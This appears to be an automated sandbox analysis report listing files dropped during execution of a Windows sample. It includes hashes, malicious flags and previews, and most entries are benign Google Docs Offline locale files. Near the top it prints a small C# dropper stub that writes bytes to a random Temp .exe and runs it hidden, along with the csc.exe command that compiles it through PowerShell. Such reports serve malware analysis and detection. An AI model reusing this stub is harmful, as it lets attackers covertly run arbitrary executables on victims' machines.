                                                                                                                                                                                                                                                                                          SHA-256:3D05A3A0104D30E7EEA56AED83E8FF656146D4C8D8DE942F6E777260B6D4E8D1
                                                                                                                                                                                                                                                                                          SHA-512:3FFFE72BB66AD68F4A02D9FBDFBB0D81DD6C1E5D923796CB9CC5C31A0D161355539ED158188AC42BA568CAF1B4947BA2600462E6BC419FBFB1B8AAA585217312
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.x.n.2.z.g.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.2.x.n.2.z.g.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.0.cs

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):648
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.601292123206071
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:gC4+FaRRco+IfnLv+F6MpqAYLI3d6wEZIws2LWhONDN+o07uE:J4+FaRxYztt6uwhQotE
                                                                                                                                                                                                                                                                                          MD5:8539B6708DDC98DF3A1CD74954DC89BD
                                                                                                                                                                                                                                                                                          SHA1:A69C850C26E8ECD62A3DC997164D4C92617FA40D
                                                                                                                                                                                                                                                                                          SHA-256:0B0D3909C6BDBCCC83F6206DD9E50CB8FCFA9CBDC250AC5D926CD0F8698ADC3D
                                                                                                                                                                                                                                                                                          SHA-512:C7D9A203876B75DBA73305732026B0D0C6BC699870731A8A67066C1EC068CC6B05A5B3AB64384005F1DCF81FD0A5D5713A30885A56016126258DB76D9A2F5AFA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:. using System;.. using System.Diagnostics;.. using System.IO;.. public class MemoryExec {.. public static void Run(byte[] exeBytes) {.. string tempFilePath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName() + ".exe");.. File.WriteAllBytes(tempFilePath, exeBytes);.. Process process = new Process();.. process.StartInfo.FileName = tempFilePath;.. process.StartInfo.UseShellExecute = false;.. process.StartInfo.CreateNoWindow = true;.. process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;.. process.Start();.. }.. }

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):371
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.281630572425161
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f5fB0zxs7+AEszI923f5fhx:p37Lvkmb6KzBfGWZE2Bfb
                                                                                                                                                                                                                                                                                          MD5:07D1C21ED9A3F1A7B2AEBFEB72D62891
                                                                                                                                                                                                                                                                                          SHA1:C4B44E0221CF8D48DC20022984B5DDE8CF978730
                                                                                                                                                                                                                                                                                          SHA-256:C8A332BB378CB15C90E24E3D8D00F614305152D6B934220A3598A913B6D12FC3
                                                                                                                                                                                                                                                                                          SHA-512:6024223A4603B87A19F3F18E2CD440C1665BF0238CC9B29B2F1C3B86B5AD602AF3C140D12748287B6B1FE47724BE1AD61F742A7B5F3593D8AA845D49F5A197CD
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.0.cs"

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.dll

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3584
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0628999703604465
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:61Ke2ro2e2Jm1V6iBzo7jh+0P1ulbGa3KFqa:Nc2e7Y79+5cKW
                                                                                                                                                                                                                                                                                          MD5:C9E8C90D951C4B569C3358F5D9FD0010
                                                                                                                                                                                                                                                                                          SHA1:C139C1F0666F2119F2CAD4FEFF7CDF71C96772AB
                                                                                                                                                                                                                                                                                          SHA-256:97FD1233E0E5F2100D83BE2F38A960894CA9BEF1C4ECCEC2985F7A0E18A95CEA
                                                                                                                                                                                                                                                                                          SHA-512:D9A7876044F1A98E0595DB2397D32042755B3CA7FCCE73AA049307EA9A181A14D8A14393911492D6AE3F77B97EE895858DC8092664F891439D4C5A36D19E8897
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)tg...........!.................%... ...@....... ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0.._.......(....(....r...p(....(.......(....s......o.....o.....o.....o.....o.....o.....o.....o.....o....&*..(....*.BSJB............v4.0.30319......l...h...#~..........#Strings....t.......#US.........#GUID.......t...#Blob...........G.........%3........................................................2.+...l.L.....L...........+...............$.....w...............................P ......9...... ......=.....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.out

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):872
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.341692113808693
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:KMoId3ka6KzB/E2BSKax5DqBVKVrdFAMBJTH:dokka6apE2wK2DcVKdBJj
                                                                                                                                                                                                                                                                                          MD5:E0740992EF323B70B9EE35901BD3275A
                                                                                                                                                                                                                                                                                          SHA1:B02B8EE0AB4F57483F30119D55A32F8D0C93811D
                                                                                                                                                                                                                                                                                          SHA-256:96C8FB53469AB2C47A04AFF39D8667F7895B6D6E5C48C3E528DA9A46198CBC85
                                                                                                                                                                                                                                                                                          SHA-512:F6867EF3F1D4E2EE1382629F0D4EDCF7822043ABDA276A5D4924B51277F2DF640C1A2C91C07F762C30674C9F0E6CFC163109B228727F67FD68A67A3B7B3320ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                          Encrypted:false
